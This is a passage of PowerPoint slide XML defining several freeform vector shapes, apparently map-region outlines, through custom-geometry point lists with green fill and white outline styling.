                      <a:pt x="72" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="33"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36271" name="Freeform 404"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2889" y="2052"/>
                <a:ext cx="125" cy="61"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 125"/>
                  <a:gd name="T1" fmla="*/ 33 h 61"/>
                  <a:gd name="T2" fmla="*/ 5 w 125"/>
                  <a:gd name="T3" fmla="*/ 33 h 61"/>
                  <a:gd name="T4" fmla="*/ 8 w 125"/>
                  <a:gd name="T5" fmla="*/ 34 h 61"/>
                  <a:gd name="T6" fmla="*/ 9 w 125"/>
                  <a:gd name="T7" fmla="*/ 37 h 61"/>
                  <a:gd name="T8" fmla="*/ 10 w 125"/>
                  <a:gd name="T9" fmla="*/ 39 h 61"/>
                  <a:gd name="T10" fmla="*/ 15 w 125"/>
                  <a:gd name="T11" fmla="*/ 36 h 61"/>
                  <a:gd name="T12" fmla="*/ 16 w 125"/>
                  <a:gd name="T13" fmla="*/ 33 h 61"/>
                  <a:gd name="T14" fmla="*/ 22 w 125"/>
                  <a:gd name="T15" fmla="*/ 33 h 61"/>
                  <a:gd name="T16" fmla="*/ 23 w 125"/>
                  <a:gd name="T17" fmla="*/ 36 h 61"/>
                  <a:gd name="T18" fmla="*/ 30 w 125"/>
                  <a:gd name="T19" fmla="*/ 35 h 61"/>
                  <a:gd name="T20" fmla="*/ 33 w 125"/>
                  <a:gd name="T21" fmla="*/ 34 h 61"/>
                  <a:gd name="T22" fmla="*/ 43 w 125"/>
                  <a:gd name="T23" fmla="*/ 31 h 61"/>
                  <a:gd name="T24" fmla="*/ 46 w 125"/>
                  <a:gd name="T25" fmla="*/ 29 h 61"/>
                  <a:gd name="T26" fmla="*/ 52 w 125"/>
                  <a:gd name="T27" fmla="*/ 30 h 61"/>
                  <a:gd name="T28" fmla="*/ 52 w 125"/>
                  <a:gd name="T29" fmla="*/ 33 h 61"/>
                  <a:gd name="T30" fmla="*/ 56 w 125"/>
                  <a:gd name="T31" fmla="*/ 34 h 61"/>
                  <a:gd name="T32" fmla="*/ 56 w 125"/>
                  <a:gd name="T33" fmla="*/ 29 h 61"/>
                  <a:gd name="T34" fmla="*/ 55 w 125"/>
                  <a:gd name="T35" fmla="*/ 26 h 61"/>
                  <a:gd name="T36" fmla="*/ 54 w 125"/>
                  <a:gd name="T37" fmla="*/ 17 h 61"/>
                  <a:gd name="T38" fmla="*/ 62 w 125"/>
                  <a:gd name="T39" fmla="*/ 12 h 61"/>
                  <a:gd name="T40" fmla="*/ 63 w 125"/>
                  <a:gd name="T41" fmla="*/ 8 h 61"/>
                  <a:gd name="T42" fmla="*/ 71 w 125"/>
                  <a:gd name="T43" fmla="*/ 7 h 61"/>
                  <a:gd name="T44" fmla="*/ 75 w 125"/>
                  <a:gd name="T45" fmla="*/ 9 h 61"/>
                  <a:gd name="T46" fmla="*/ 83 w 125"/>
                  <a:gd name="T47" fmla="*/ 8 h 61"/>
                  <a:gd name="T48" fmla="*/ 98 w 125"/>
                  <a:gd name="T49" fmla="*/ 3 h 61"/>
                  <a:gd name="T50" fmla="*/ 115 w 125"/>
                  <a:gd name="T51" fmla="*/ 4 h 61"/>
                  <a:gd name="T52" fmla="*/ 119 w 125"/>
                  <a:gd name="T53" fmla="*/ 7 h 61"/>
                  <a:gd name="T54" fmla="*/ 118 w 125"/>
                  <a:gd name="T55" fmla="*/ 14 h 61"/>
                  <a:gd name="T56" fmla="*/ 125 w 125"/>
                  <a:gd name="T57" fmla="*/ 23 h 61"/>
                  <a:gd name="T58" fmla="*/ 120 w 125"/>
                  <a:gd name="T59" fmla="*/ 30 h 61"/>
                  <a:gd name="T60" fmla="*/ 114 w 125"/>
                  <a:gd name="T61" fmla="*/ 29 h 61"/>
                  <a:gd name="T62" fmla="*/ 110 w 125"/>
                  <a:gd name="T63" fmla="*/ 31 h 61"/>
                  <a:gd name="T64" fmla="*/ 114 w 125"/>
                  <a:gd name="T65" fmla="*/ 34 h 61"/>
                  <a:gd name="T66" fmla="*/ 110 w 125"/>
                  <a:gd name="T67" fmla="*/ 37 h 61"/>
                  <a:gd name="T68" fmla="*/ 112 w 125"/>
                  <a:gd name="T69" fmla="*/ 43 h 61"/>
                  <a:gd name="T70" fmla="*/ 108 w 125"/>
                  <a:gd name="T71" fmla="*/ 49 h 61"/>
                  <a:gd name="T72" fmla="*/ 104 w 125"/>
                  <a:gd name="T73" fmla="*/ 54 h 61"/>
                  <a:gd name="T74" fmla="*/ 95 w 125"/>
                  <a:gd name="T75" fmla="*/ 55 h 61"/>
                  <a:gd name="T76" fmla="*/ 85 w 125"/>
                  <a:gd name="T77" fmla="*/ 56 h 61"/>
                  <a:gd name="T78" fmla="*/ 78 w 125"/>
                  <a:gd name="T79" fmla="*/ 59 h 61"/>
                  <a:gd name="T80" fmla="*/ 73 w 125"/>
                  <a:gd name="T81" fmla="*/ 58 h 61"/>
                  <a:gd name="T82" fmla="*/ 62 w 125"/>
                  <a:gd name="T83" fmla="*/ 56 h 61"/>
                  <a:gd name="T84" fmla="*/ 46 w 125"/>
                  <a:gd name="T85" fmla="*/ 53 h 61"/>
                  <a:gd name="T86" fmla="*/ 42 w 125"/>
                  <a:gd name="T87" fmla="*/ 48 h 61"/>
                  <a:gd name="T88" fmla="*/ 35 w 125"/>
                  <a:gd name="T89" fmla="*/ 46 h 61"/>
                  <a:gd name="T90" fmla="*/ 30 w 125"/>
                  <a:gd name="T91" fmla="*/ 46 h 61"/>
                  <a:gd name="T92" fmla="*/ 26 w 125"/>
                  <a:gd name="T93" fmla="*/ 47 h 61"/>
                  <a:gd name="T94" fmla="*/ 20 w 125"/>
                  <a:gd name="T95" fmla="*/ 51 h 61"/>
                  <a:gd name="T96" fmla="*/ 15 w 125"/>
                  <a:gd name="T97" fmla="*/ 47 h 61"/>
                  <a:gd name="T98" fmla="*/ 9 w 125"/>
                  <a:gd name="T99" fmla="*/ 49 h 61"/>
                  <a:gd name="T100" fmla="*/ 5 w 125"/>
                  <a:gd name="T101" fmla="*/ 45 h 61"/>
                  <a:gd name="T102" fmla="*/ 2 w 125"/>
                  <a:gd name="T103" fmla="*/ 43 h 61"/>
                  <a:gd name="T104" fmla="*/ 2 w 125"/>
                  <a:gd name="T105" fmla="*/ 37 h 61"/>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25"/>
                  <a:gd name="T160" fmla="*/ 0 h 61"/>
                  <a:gd name="T161" fmla="*/ 125 w 125"/>
                  <a:gd name="T162" fmla="*/ 61 h 61"/>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25" h="61">
                    <a:moveTo>
                      <a:pt x="1" y="33"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="33"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36272" name="Freeform 405"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2833" y="2080"/>
                <a:ext cx="71" cy="44"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 58 w 71"/>
                  <a:gd name="T1" fmla="*/ 9 h 44"/>
                  <a:gd name="T2" fmla="*/ 58 w 71"/>
                  <a:gd name="T3" fmla="*/ 15 h 44"/>
                  <a:gd name="T4" fmla="*/ 61 w 71"/>
                  <a:gd name="T5" fmla="*/ 17 h 44"/>
                  <a:gd name="T6" fmla="*/ 65 w 71"/>
                  <a:gd name="T7" fmla="*/ 21 h 44"/>
                  <a:gd name="T8" fmla="*/ 71 w 71"/>
                  <a:gd name="T9" fmla="*/ 19 h 44"/>
                  <a:gd name="T10" fmla="*/ 70 w 71"/>
                  <a:gd name="T11" fmla="*/ 24 h 44"/>
                  <a:gd name="T12" fmla="*/ 70 w 71"/>
                  <a:gd name="T13" fmla="*/ 28 h 44"/>
                  <a:gd name="T14" fmla="*/ 67 w 71"/>
                  <a:gd name="T15" fmla="*/ 26 h 44"/>
                  <a:gd name="T16" fmla="*/ 64 w 71"/>
                  <a:gd name="T17" fmla="*/ 30 h 44"/>
                  <a:gd name="T18" fmla="*/ 64 w 71"/>
                  <a:gd name="T19" fmla="*/ 35 h 44"/>
                  <a:gd name="T20" fmla="*/ 59 w 71"/>
                  <a:gd name="T21" fmla="*/ 32 h 44"/>
                  <a:gd name="T22" fmla="*/ 57 w 71"/>
                  <a:gd name="T23" fmla="*/ 34 h 44"/>
                  <a:gd name="T24" fmla="*/ 55 w 71"/>
                  <a:gd name="T25" fmla="*/ 29 h 44"/>
                  <a:gd name="T26" fmla="*/ 52 w 71"/>
                  <a:gd name="T27" fmla="*/ 33 h 44"/>
                  <a:gd name="T28" fmla="*/ 49 w 71"/>
                  <a:gd name="T29" fmla="*/ 43 h 44"/>
                  <a:gd name="T30" fmla="*/ 44 w 71"/>
                  <a:gd name="T31" fmla="*/ 41 h 44"/>
                  <a:gd name="T32" fmla="*/ 43 w 71"/>
                  <a:gd name="T33" fmla="*/ 38 h 44"/>
                  <a:gd name="T34" fmla="*/ 39 w 71"/>
                  <a:gd name="T35" fmla="*/ 30 h 44"/>
                  <a:gd name="T36" fmla="*/ 34 w 71"/>
                  <a:gd name="T37" fmla="*/ 37 h 44"/>
                  <a:gd name="T38" fmla="*/ 30 w 71"/>
                  <a:gd name="T39" fmla="*/ 43 h 44"/>
                  <a:gd name="T40" fmla="*/ 21 w 71"/>
                  <a:gd name="T41" fmla="*/ 43 h 44"/>
                  <a:gd name="T42" fmla="*/ 16 w 71"/>
                  <a:gd name="T43" fmla="*/ 38 h 44"/>
                  <a:gd name="T44" fmla="*/ 9 w 71"/>
                  <a:gd name="T45" fmla="*/ 31 h 44"/>
                  <a:gd name="T46" fmla="*/ 0 w 71"/>
                  <a:gd name="T47" fmla="*/ 37 h 44"/>
                  <a:gd name="T48" fmla="*/ 2 w 71"/>
                  <a:gd name="T49" fmla="*/ 32 h 44"/>
                  <a:gd name="T50" fmla="*/ 2 w 71"/>
                  <a:gd name="T51" fmla="*/ 27 h 44"/>
                  <a:gd name="T52" fmla="*/ 7 w 71"/>
                  <a:gd name="T53" fmla="*/ 19 h 44"/>
                  <a:gd name="T54" fmla="*/ 11 w 71"/>
                  <a:gd name="T55" fmla="*/ 16 h 44"/>
                  <a:gd name="T56" fmla="*/ 16 w 71"/>
                  <a:gd name="T57" fmla="*/ 11 h 44"/>
                  <a:gd name="T58" fmla="*/ 14 w 71"/>
                  <a:gd name="T59" fmla="*/ 9 h 44"/>
                  <a:gd name="T60" fmla="*/ 19 w 71"/>
                  <a:gd name="T61" fmla="*/ 6 h 44"/>
                  <a:gd name="T62" fmla="*/ 22 w 71"/>
                  <a:gd name="T63" fmla="*/ 7 h 44"/>
                  <a:gd name="T64" fmla="*/ 27 w 71"/>
                  <a:gd name="T65" fmla="*/ 5 h 44"/>
                  <a:gd name="T66" fmla="*/ 31 w 71"/>
                  <a:gd name="T67" fmla="*/ 5 h 44"/>
                  <a:gd name="T68" fmla="*/ 37 w 71"/>
                  <a:gd name="T69" fmla="*/ 4 h 44"/>
                  <a:gd name="T70" fmla="*/ 38 w 71"/>
                  <a:gd name="T71" fmla="*/ 2 h 44"/>
                  <a:gd name="T72" fmla="*/ 43 w 71"/>
                  <a:gd name="T73" fmla="*/ 1 h 44"/>
                  <a:gd name="T74" fmla="*/ 46 w 71"/>
                  <a:gd name="T75" fmla="*/ 2 h 44"/>
                  <a:gd name="T76" fmla="*/ 57 w 71"/>
                  <a:gd name="T77" fmla="*/ 5 h 44"/>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71"/>
                  <a:gd name="T118" fmla="*/ 0 h 44"/>
                  <a:gd name="T119" fmla="*/ 71 w 71"/>
                  <a:gd name="T120" fmla="*/ 44 h 44"/>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71" h="44">
                    <a:moveTo>
                      <a:pt x="57" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="30"/>
